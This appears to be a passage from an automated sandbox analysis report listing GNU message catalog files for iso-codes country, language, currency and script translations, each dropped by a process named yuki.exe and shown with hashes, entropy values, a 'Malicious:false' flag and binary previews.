                                                                                                    SHA-512:915C8EA099656C644F8EE72BB0D6E66AB02B9790B12757BEAE6F865962136182367B9B52A4476A3DAFA1FB8635181FA1238AEE4D822312529430F212BB9160CD
                                                                                                    Malicious:false
                                                                                                    Preview:........}........................................................ ....... ....... ....... ....... ......# ......- ......2 ......; ......C ......L ......b ......h ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!....../!......8!......F!......O!......V!......^!......e!......l!......x!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......!"......)"......2"......;"......C"......L"......U"......]"......e"......t"......|".......".......".......".......".......".......".......".......".......".......".......".......".......".......".......".......".......#.......#......$#......*#......3#......C#......H#......[#......b#......j#......r#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......0$......9$......?$......B$......O$......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 120 messages, Project-Id-Version: iso_639-3 '\340\244\205\340\245\223\340\244\226\340\245\207\340\245\203\340\245\243\340\245\246\340\245\226\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6584
                                                                                                    Entropy (8bit):4.796179939870329
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:eQGmddwh8S3eBVkjPP9qMNeRSxrco6TH2:eQGWdO8Su/YdqMNehL2
                                                                                                    MD5:772B928B1E6953E852CF75BEA32B92DF
                                                                                                    SHA1:48E31949C359BDCF362D6FC63F5AC875DE607C26
                                                                                                    SHA-256:E52E2BF6644B9085E1944A03A18A6340A38695A627222E7D92E94C25A57438F3
                                                                                                    SHA-512:B3D31B0198ECC2D467599C17E4922CAEBFA7EB8C4E66EF9DCF4B06BB3E8F1A1CCA5311F0B93269C74A75BA3FF0410EFC22757825944744E2005EF5B3C6323830
                                                                                                    Malicious:false
                                                                                                    Preview:........x.......................(.......).......3.......8.......B.......K.......S.......Z.......c.......l.......s.......................................................................................................................................................................#.......*.......2.......9.......B.......I......._.......g.......p.......v.......}...............................................................................................................................................................%.......-.......5.......@.......K.......T.......^.......f.......l.......t.......~.......................................................................................................................................................................'.......1.......7.......?.......G.......M.......S.......Y.......`.......e.......m.......v...................................................................................................................................L...........
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 109 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5803
                                                                                                    Entropy (8bit):5.098920930476457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TSrCzC6I9kOhdxuoJJaWP9uYqLamudfy5M9ZOKj8UfnGsD9cbM9snfWf+rl3u:TtjI9/X/+WPRqLamoq0OKj3fGsxmcs+t
                                                                                                    MD5:A659A69A461BFA9B44ED254307C1938F
                                                                                                    SHA1:1E6A3F381318A6201E8C13F5C8B1B29F96C88F5C
                                                                                                    SHA-256:0596C7F0DF3B131AC53F4F9924E09DBB95D1B77B2F5869C1DCC31D28A5CCF439
                                                                                                    SHA-512:0389615FDE4CC851B6D546026198828EE34AF207739C4FA02E657F52A7FCFC274F2EFE4ED764060237B47A3A69FA77A5B04B9AB65CCF55EBE356F35B6E5C4C9E
                                                                                                    Malicious:false
                                                                                                    Preview:........m.......................@.......A.......M.......U.......].......g.......o.......y.......................................................................................................................................................*.......2.......E.......K.......W.......`.......n.......v.......}....................................................................................................................................................................... .......+.......2.......:.......H.......R.......].......f.......o.......u.......|...............................................................................................................................................'.......-.......5.......A.......L.......Y.......`.......j.......s.......|...............................................................................................................).......1.......7.......F...............-.......<.......K.......^.......m...............................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 211 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9310
                                                                                                    Entropy (8bit):4.779977332118223
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4XONIgXiXswvc0BohH5OLoyiTX4zugomuxCDVaBY6rPGENh:4ZUiXsxRgLoyizgugomuxCDVaBNrPGeh
                                                                                                    MD5:A351848456824D3F2EF389372E8D7771
                                                                                                    SHA1:7BFEA9A6F2497583319B1D763EF77967DEAA4FC3
                                                                                                    SHA-256:0F183DDF6295265F33677EE49E9F8B38EFA5617A3FAEB9229F3049DC33A6DA35
                                                                                                    SHA-512:E5992918C2EEF1FAA6876DC6C6FA9668B09A3E88FBE7AA15FF5416581B452FB380BE6F4C4082E680BAE16C79F92B5F030E0D799C7CCAE31AC45E4D9AFE3E2367
                                                                                                    Malicious:false
                                                                                                    Preview:........................L....................................................................................................... .......*.......2.......=.......E.......P.......Y.......a.......i.......p.......v.......~...............................................................................................................*......./.......5.......M.......V.......^.......k.......v.......~.......................................................................................................................0.......5.......=.......D.......R.......c.......i.......q.......y.......................................................................................................................................................................'.......3.......:.......@.......H.......N.......U.......\.......g.......m.......v.......}.......................................................................................................................................................'...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 414 messages, Project-Id-Version: Kyrgyz (iso-codes) '\320\236\320\276\320\263\320\260\320\275\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29069
                                                                                                    Entropy (8bit):5.283762117884823
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:CLojGNx9vmsOP4XLAIUtnKntsAK/g3tIb0GO3fMR7rL7O/2/6VTbP4Jed1bDNwSS:SNr+tytsAK/g3tIbi3fM5rL6/8QD4JGw
                                                                                                    MD5:FCCFBFFD0E54A38C95C426A5D853C455
                                                                                                    SHA1:7E1F01AB8B07CF35301B31D98565D117FFFD37B4
                                                                                                    SHA-256:D2BBC74779DE4401B9B0F0FF553669C9957DAC8BBC7E2D88A9CF4F3709AADDB0
                                                                                                    SHA-512:E6F891638301FB1DD0FA7CCC82651814A39D7B08D98DA92ABC92AF282DAABF8F1F04222769F7711ADB9C705F9BE11D2CE6FE24BE6C04912BF8E68D5ADD662402
                                                                                                    Malicious:false
                                                                                                    Preview:....................-............".......".......".......".......".......".......".......".......".......".......#......*#......4#......G#......O#......U#......_#......g#......r#......z#.......#.......#.......#.......#.......#.......#.......#.......#.. ....#.......#.......#.. ....$......,$......C$......L$......Z$......a$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%......$%......5%......M%......V%......o%..,....%.......%.......%..%....%.......%.......%.......&.......&.......&.......&......!&......0&......8&..%...G&..,...m&.."....&..*....&.......&.......&.......&.......'.......'......1'......9'......?'......K'......]'......e'......m'......v'.......'..'....'..$....'.......'.......(......%(......A(......`(......~(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......).......)......6)......=)......G)......O)......Z)......_)......i)......r)......y).......).......).......)..!...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 18 messages, Project-Id-Version: iso_3166-2 '\320\220\320\274\320\265\321\200\320\270\320\272\320\260 \320\241\320\260\320\274\320\276\320\260\321\201\321\213'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1419
                                                                                                    Entropy (8bit):5.44994817725979
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tZpO3Jwzug1+dQhhtthNky3NEfSt0UZT/i3E/IXmGfy4DXfbxQM0Npcqu:P1+dQHfhNp3af/UZDRADXj+1Nnu
                                                                                                    MD5:4D571B2B4FB5C93EB759E5767C65500F
                                                                                                    SHA1:732E6CB363D1258FFF0522EBE0777AC31435E7CE
                                                                                                    SHA-256:60DCE1BE9061B3B92A65B8ED5373AB9D55B0477DC3903A93817D8B9DC9E5E150
                                                                                                    SHA-512:549449D4734C45BCAE5AEC9BD761EE733D96AB04AB4C08D3BD4D4F87564E36FDA41E6CD02E442AECB25A0CE74F8B5F88F67B0E1C819F048F8C9F2418B145C0AB
                                                                                                    Malicious:false
                                                                                                    Preview:........................<.......................................................................................................................$.......*.......C...$...O.......t.......A......._.......j.......u...............................................................................................C...1...Y........................................................................................................................American Samoa.Aruba.Belize.Cura.ao.Djibouti.Georgia.Guadeloupe.Guam.Guatemala.Luxembourg.Mali.Martinique.Mayotte.Niger.Northern Mariana Islands.Puerto Rico.United States Minor Outlying Islands.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2018-02-20 17:37+0000.Last-Translator: Ilyas Bakirov <i.bakirov@gmail.com>.Language-Team: Kyrgyz <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/ky/>.Language: ky.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Trans
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 79 messages, Project-Id-Version: iso_3166-1 '\340\272\233\340\272\260\340\273\200\340\272\227\340\272\224\340\272\255\340\272\261\340\272\207\340\272\224\340\272\255\340\272\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5756
                                                                                                    Entropy (8bit):4.869193348580799
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:g5hHWtz+sTG6ndCjA+utDymko6X1C1H9O2m0ipzQU1tHHaDv4+UQw7:EN6dCk+vmrdO2XipzQU1tHHaDvg37
                                                                                                    MD5:80E2F988B04790515A7A05EA049547A2
                                                                                                    SHA1:150DFA009DC80007355E513C9B90E094E3FFFF3F
                                                                                                    SHA-256:294571BEC0D29F1BF52D0DE07340001B7CB962C839621C150D277EC743AD8A3E
                                                                                                    SHA-512:495EE1A5552F98BB598CC1873DE16A7E4CDE7E920B3F784BBD8F2B5B44282DD71E94FC2AAF1F372F5A3EF5BCF37E9F51A4226CD910414AED9E315BB4BEB1A7BA
                                                                                                    Malicious:false
                                                                                                    Preview:........O...........k...................................................................................................................1.......8.......A.......J.......Q.......W.......`.......k.......s.......z...............................................................................................................................................................&.......0.......;.......D.......J.......Q.......X.......`.......l.......x.......................................................................................................................................!.......*.......1.......=.......D.......M.......U.......d.......}...........................!...c...$...............$.......*.......$.......0...;...-...l...*.......!.......!.......B.......$...L...$...q...$.......!...............$.......0.......'...9.......a...-...z...!.......'...............!.......!...0...'...R...*...z...!.......*.......!...............$...'.......L...-...e...!...............$.......$.......0.......$...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 181 messages, Project-Id-Version: iso_15924 'Adlamas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10170
                                                                                                    Entropy (8bit):5.135788454292222
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:D+gwxVk669aQmZaitBarpVatU4WjV9qWxa5hWHA0POFP32GG:b+2CFWrpVR4WjVDxa5hWH7OFmGG
                                                                                                    MD5:5E0B53C57A76BBBC0BA58EFE09043278
                                                                                                    SHA1:031FF82110AE6B61915084C5BA458DC69C0049ED
                                                                                                    SHA-256:F5061E6C1D155D9AF7974F1AF4D945348D9EA5C96EAFC4622312A3175452D84B
                                                                                                    SHA-512:072C4B2373167E303F1CEF6D80CCA22CF6BD4ED38D2FD687B41BED238DEC86C08398CF9E1B78B2F7A9EBAC6A4F5C3129738DDF9A98B11C0EE9C94BAF14610154
                                                                                                    Malicious:false
                                                                                                    Preview:........................l.......0.......1.......7.......=...?...L.......................................................................................................................................%.......,.......?.......F.......K.......T.......Z.......t...................................................&........... .......1...(...E.......n.......................................................................................................!.......:...,...T...........................................................................&...........;...4...j...................................................................................................#...#.......G.......[.......{.......................................................................................................................................-.......8.......@.......V.......h...................................................(.......................................-...8.......f...!...r...........................#...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistanas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24199
                                                                                                    Entropy (8bit):5.088600417448717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosUIBPcDz0LBa346nbjz5wsWP48WAINiZGCu6uY6qmsI713dzlUcfNBL:0okhdY48fmsWP48WAI3vqA1/fNd
                                                                                                    MD5:08750EAE16EB7CEACE425D32DBEAB496
                                                                                                    SHA1:E822E4D77A708D11CF6E388EA5C40B094DCAFC80
                                                                                                    SHA-256:A16370FC72E761756B6916342587F6AB656A2BFBB1E73797EEE23BCF3D50B8B7
                                                                                                    SHA-512:4827B18C8A8A8AA3B4AA20DF7AA4741FEA64B98BEE664A378D27D166124E380B4323C712BB1D6E13299D88F9310DFA7C90729932F97359F1F42805BD505F53E3
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1666 messages, Project-Id-Version: iso_3166-2 'Aargau'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75519
                                                                                                    Entropy (8bit):5.104631523073754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:O5G4fnuIZp3t8nlrB6/jyjgxTY/Dkhs1ND:mVfnuID3erB6jEOTY461d
                                                                                                    MD5:3A8E1C76E04991C0A71FEAA64E596140
                                                                                                    SHA1:BD0641DCF9462983FCB2250942E5B8B518925D56
                                                                                                    SHA-256:067A7AB2151F5B146E59F59D46F621C94B0BF8CF6A4487F2482065FFDCD3CF3F
                                                                                                    SHA-512:B012033E9B08F2F9284DE7DA45C44403BA8FCC6F7FD585A04FA91AA483E4FD64B1696865FA3FCDB0C65DE3390815C547ECB526FE2F31554BA9DC592479BE8616
                                                                                                    Malicious:false
                                                                                                    Preview:................,4......<h.....................................................".......*.......3.......8.......=.......F.......N.......T.......Z.......d.......k.......z.........................................................................................................................................................".......'.......0.......8.......D.......J.......R.......Y.......`.......i.......y..........................................................................................................*.......1.......8.......@.......M.......W.......c.......m.......y................................................................................................................................#.......,.......4.......<.......C.......I.......W.......e.......k.......r.......w...................................................................................................................................).......:.......E.......L.......T.......[.......d.......j.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Brit\305\263 Antarktidos teritorija'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2987
                                                                                                    Entropy (8bit):5.305470023692067
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3XAElp2U3f+vGqIfdvqN5CoUrcofdPQv/TlkU/IuHKwFNA1/I+/ayiyhZDBxs:rLvXA6f+yaCo+cofdPQGE/DegbEss0
                                                                                                    MD5:8BE8BCFF1A73375F64C1CD09CB02B00B
                                                                                                    SHA1:E5BC1E8B1A4F1533C4A7C82CB7BBAA216AF49048
                                                                                                    SHA-256:91503BF2C78A9403E2215B00BABB21B98BC909BBB0FA2B5D7101A108BDB90424
                                                                                                    SHA-512:96CA99B6E7929B2A98EE8573F98A520196CACF08998FDA615D25C1CC131BB0E218F6C52A3E266CD4EA0A3E8865AACAA841DF0476DC4B9E30EE3A1C46A74ECFFF
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............F...........4...(...R...-...{...........8...........................!......./.......H...1...b..."...........................................................).......X.......l...................%.......1............... ...........3...'...>...3...f................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Afrikos pl\304\227tros banko valiutos/apskaitos vienetas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10089
                                                                                                    Entropy (8bit):5.011402842696877
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFi7lqD+HM6VRyK0G/2LCntxaVLyEIGYMZ2nP5t6coLfK:SEqDwM6TL0G/Uo/IOG8nXwK
                                                                                                    MD5:ACAADB0967D5387B142A8314C6899E6D
                                                                                                    SHA1:4BD9684275C5DEADB246F64EF9EDF21012E18DEF
                                                                                                    SHA-256:A563DE9AEDD2B2F81E7288715A4432756BEB9FE60EF01934F362DB211789A1ED
                                                                                                    SHA-512:A045C58A114B09E4BE99E75275FF5D566753A2447195A9E3CC0D3C890349ECEA4EAACAAE38750738BD386FC198584A430B2769ED06A0C46260BE50ACB023898B
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 633 messages, Project-Id-Version: iso_639-3 'Abchaz\305\263'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):31678
                                                                                                    Entropy (8bit):5.065490467899256
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:c0sPgHvWSSJB+e2T1HMVzrC8ESY9ApxrguSm4:c09H0opszrJEBCpxcus
                                                                                                    MD5:4053466C8587AD120F43CBE0C7AB6175
                                                                                                    SHA1:D0DF527B0D71C84938F70209DBAC240CFDB4A5F5
                                                                                                    SHA-256:7381EB555156D562078362E80F0D5E1A48BB9A003811A565FED23239E7D049FC
                                                                                                    SHA-512:27B97A5F3C79BDE5C2A4248FA372A58821FED0CA9A5614AE932B7F9E552B69ADC7872FFF96557A86253AA2AC0DB4148F3FBBE9BC7CD3A21E5A28E479BFEEED4D
                                                                                                    Malicious:false
                                                                                                    Preview:........y...........U....'.......5.......5.......5.......5.......5......"5......)5.......5......C5......L5......V5......c5......p5......u5......~5.......5.......5.......5.......5.......5.......5.......5.......5.......6.......6.......6......-6......;6......X6......h6......o6.......6.......6.......6.......6.......6.......6.......6.......6.......7......%7......:7......I7......^7......o7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......8.......8......#8......:8......N8......_8......h8..#...q8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......9.......9.......9......+9......39......;9......B9......H9......M9......X9......g9......o9......x9......~9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......:.......:.......:......7:......>:......L:......]:......l:......t:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;......#;......9;......F;......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 115 messages, Project-Id-Version: iso_639-5 'Afroazin\304\227s kalbos'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7646
                                                                                                    Entropy (8bit):5.0127082628901505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rjToG70K5Ev/KAqxlSlSE0BfCuXr5VFJHVCcGfdP3ARzpH8Re6ysy7j:rXL7d5m/KQSE0BfNFaTARqsN
                                                                                                    MD5:20CBACEADE012DCBA81106585FEAD3B1
                                                                                                    SHA1:35503FB72D474D454B2DD0F9054DAE573FDC5F5B
                                                                                                    SHA-256:AD019A631494E4002A7ABD80216D57C7425017ADC681A5B334EE9A2304FF87C5
                                                                                                    SHA-512:CD68DE59334097E2F35ED83F22A3B41B25EF2FC6ED17173AB5C249DF5BB2B568B280CA352DADB26D7414EC127430940E50E5058EBB1124EDCB2CF8F3041CBB43
                                                                                                    Malicious:false
                                                                                                    Preview:........s...............L.......................................................%.......6.......G.......X.......k.......}...............................................................).......9.......I.......Y.......i.......z...........................!.......#...................".......3.......D.......W.......h...$...|...#.......%...................................*...#...@.......d.......~.......................................................................(.......8.......P.......g.......y.......................................................................'.......7.......H.......X.......l...............................................................!.......:.......K.......\.......s...............................................................................).......@.......Q.......b.......t...............................................................................?.......U.......h...........#...............................D...................A.......S.......b.......o.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 169 messages, Project-Id-Version: iso_15924 'Afaka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9267
                                                                                                    Entropy (8bit):5.109043844964091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6nCkD5TDkqeEmh64Lj4Sa5hW8sxNUQhAx2Jwuk:oJMI4Ljza5hW8sxdhiOwR
                                                                                                    MD5:E9FCED380C9861BC3913CC45D7253D9C
                                                                                                    SHA1:294673BC48C072A6CAA6B2D63D2E6A0C65860BE5
                                                                                                    SHA-256:3A84BCAAE73091E117C5F9F5446B454E5B599D195F3BF96F994B3F277B4F365F
                                                                                                    SHA-512:FBDA6F8C85D1C90FC4E58281B35B9C680CFAA30EE319A3328C434A49CC695569EF88B08A10E6A911C691CC4BB70EC4FC1006BD2F5E442600A0AAC7AC4B1EB2A8
                                                                                                    Malicious:false
                                                                                                    Preview:................d...............8.......9...?...?...............................................................................................................................................................$.......-.......3.......M.......e...........................................&.......................(...........G.......X.......j.......................................................................................................-.......G.......Z.......a.......h.......q...................................4...........$.......-.......5.......<.......D.......M.......V.......a.......g.......n...#...................................................................................".......+.......9.......>.......E.......L.......U......._.......q.......|...................................................................(...........G.......P.......X.......j...-...t...................................#...............".......)...).......S.......^.......j.......|...............................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 410 messages, Project-Id-Version: iso_3166-1 'Afganist\304\201na'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22888
                                                                                                    Entropy (8bit):5.084007169254144
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:te7hGfQDzPGKQnxtHiw2u6gIoG8je5wsOP4XLAE1irKYRlR6VV8Zr8Y+Ue:prKQHHiJCFn6msOP4XLAEWXZrpW
                                                                                                    MD5:D28EFACC6661D9E69A7D26EA6CEBC580
                                                                                                    SHA1:8AA8359B1A749FBB5753EA7D46253030D19B7349
                                                                                                    SHA-256:15B8A0118264BA73EE29A5D12BCA29F854014ADB3F7A190F1FB4F9531166D0EB
                                                                                                    SHA-512:3AF45B9D781DEFFD7B75634918CB7E7A6783B0135CA23DB8096BFA5759D52D1913AA81AE5FF71AC4AB1FE8F0A49DC4A1296AC77081783782244A80386E639E34
                                                                                                    Malicious:false
                                                                                                    Preview:....................#...........H"......I"......U"......]"......e"......t"......|".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#......%#.......#......6#......>#......E#......K#......S#.. ...Z#......{#.......#.. ....#.......#.......#.......#.......#.......#.......$....../$......A$......J$......W$......_$......h$......q$......x$.......$.......$.......$.......$.......$.......$.......$.......$.......$..,....%......E%......M%..%...S%......y%.......%.......%.......%.......%.......%.......%.......%..%....%..,....%.."....&..*...B&......m&......u&......~&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'..'...%'..$...M'......r'.......'.......'.......'.......'.......(.......(.......(.......(......%(......6(......F(......b(......h(......z(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......)..!...5)......W)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 54 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2565
                                                                                                    Entropy (8bit):4.782073168393619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:zNc4/bmClMmfhgiWl6D0UbeFhNbxgC0lY1UtdaMj5/Y/U3sKGqr6rZV0SGZJL:zhtlRfif6o99gO1UiMlY/CsKGY6FGZJL
                                                                                                    MD5:D1FAC687A94AAE6730FDA00371951CD6
                                                                                                    SHA1:92130BE1BCC8DCA7BB7B6C27215A755896CD1003
                                                                                                    SHA-256:31A00785941B797CA76DCFC9E3F893B1A130A8C8F7B283C856C57048C7BC3121
                                                                                                    SHA-512:3A674562B4CC08368565B1B3DB555CD2B51B7B08898884471470DCB5E7096ADB56851BC6C6DD42317B1569B710028A3D74AEDD1C248AD1234CB30B4D4C629679
                                                                                                    Malicious:false
                                                                                                    Preview:........6...........I...|.......................................................................................................................................%.......+.......4.......<.......A.......H.......Q.......[.......a.......f.......o.......y...............................................................................................................................%.......1.......8.......B...$...H.......m.......u.......~...........................E...........................................................&.......2.......:.......C.......N.......V.......`.......f.......p.......w.......~.......................................................................................................................................................+.......9.......Q.......W.......`.......i.......q...............................................................................................,...6...............'...........................#.......................................$...*...!.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britu Antarktikas Teritorijas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2671
                                                                                                    Entropy (8bit):5.258607830500166
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADLD9YvGqIfdvqNuoUozOW5uFp68WGkHfAwCNxDrIs:qDLD9YyBoJdO6nLHfc1
                                                                                                    MD5:B2E8669BE96F598526BFC39FE87B1D57
                                                                                                    SHA1:6C4C3ED10D0C8D6795CFDA75FB664F9457E91F5E
                                                                                                    SHA-256:15FF7DEC409E481941E60CD144150D873D1A1F42C83AC8D4BBBD5A8D89240FB0
                                                                                                    SHA-512:9EC03DF46DF6176BDE392EEFCD7B0A301E3F230D800A728AD22A12B41B32B11BE13D4E12BA2C0BFB1D91748D00F6882042F5B30BBB28A26BE57483107530AEAB
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.................................../...............2...........0.......9.......O.......]..."...t...+.......!...........................................2.......A.......S.......h.......}...................#.......1..............."...........5...'...A.......i........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 'Afg\304\201ns'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7313
                                                                                                    Entropy (8bit):4.936608681028899
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ffXUSiqyeGGGb5E09Sg8pCuSyzZIG8ldS3kwKmFzGA795Y8nGsPrEkv:Hniqyeh4N8PCVOkKkC93nZQkv
                                                                                                    MD5:2FB3417E7940A35584045B36CE9FB088
                                                                                                    SHA1:01E83280A73E10A6C9B4E3C33228F47A205F0643
                                                                                                    SHA-256:009F2E7D5B4DFB3E0CD03B58585312056331C2B580723F10201C4DCBC8B1124D
                                                                                                    SHA-512:5B12598CEA09233CC1292BCE017F242AF46790E8373069E7342F0B97E82B226CE3A82F231078E8682A9C0539255A4F0FB1D6EC20ECE88D37E1D90DAB5FAB6BF7
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 255 messages, Project-Id-Version: iso_639-3 'A\304\215olu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10625
                                                                                                    Entropy (8bit):4.836030414467302
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:VgmjZA1gOwTsSHhPtlYZU28rT9PFotftLzB5X5c1IadyY1yWbtAF9fO:Vg3gxBVlYZt8tFoBBN0qa0ObOFQ
                                                                                                    MD5:A3E2611A49C90FE77A668EB7A244C466
                                                                                                    SHA1:38E1EBFC7A2948FE3672B92D57674292A8DC8D6A
                                                                                                    SHA-256:390C2A8809D5FA48DED3AC4C9D8E706BF0713A5DD946D0A6B27EB7BE508077EA
                                                                                                    SHA-512:6038D06321590BA3295E918D7B0B0FD4F80301EE933098E764165EFD72DDA67C405D2307A324F41A70E0C1EB4DF7621E3AC04C712C3249AE41F7720AA26890A9
                                                                                                    Malicious:false
